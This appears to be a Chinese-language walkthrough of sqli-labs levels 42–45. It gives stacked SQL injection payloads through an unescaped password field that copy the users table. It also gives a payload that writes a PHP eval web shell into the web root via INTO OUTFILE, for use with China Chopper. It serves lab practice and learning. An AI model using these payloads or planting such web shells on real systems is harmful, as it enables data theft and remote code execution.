less42: POST类型(注意:传参时候不能用--+ 要用#即%23)使用''包裹
我们可以看到password没有经过mysqli_real_escape_string()函数进行处理,所以这个时候我们在这个位置进行构造
Admin admin 登录
a
a';create table gxy42 like users;insert into gxy42 select *from users; #
虽然显示这个,但是我们看sql数据库,说明我们注入成功
Less43: 使用(‘’)包裹 其他与第42关一致
通过查看login.php源码我们知道跟第42关区别就是用户名跟密码用(‘’)包裹,其余与第42关一样
a
a');create table gxy43 like users;insert into gxy43 select *from users; #
less-44: 使用’’包裹 其他与第42关一致
没有回显信息 id=’1‘
password构造语句:a';create table gxy44 like users;insert into gxy44 select *from users; #
less-45: 使用(‘’)包裹 其他与第42关一致
没有回显信息 id=(’1‘)
password构造语句:a');create table gxy45 like users;insert into gxy45 select *from users; #
或者使用堆叠注入写入一句话木马配合中国菜刀进行注入
需要条件:
- 必须要有写权限
- 一句话木马
- Select xxx into outfile xxx
- 写入点
一句话木马 <?php @eval($_POST[crow]);?>
写入路径 C:\phpStudy\WWW
最终结果 a’) select ‘<?php @eval($_POST[crow]);?>’ into outfile ‘C:\phpStudy\WWW\a.php’;#
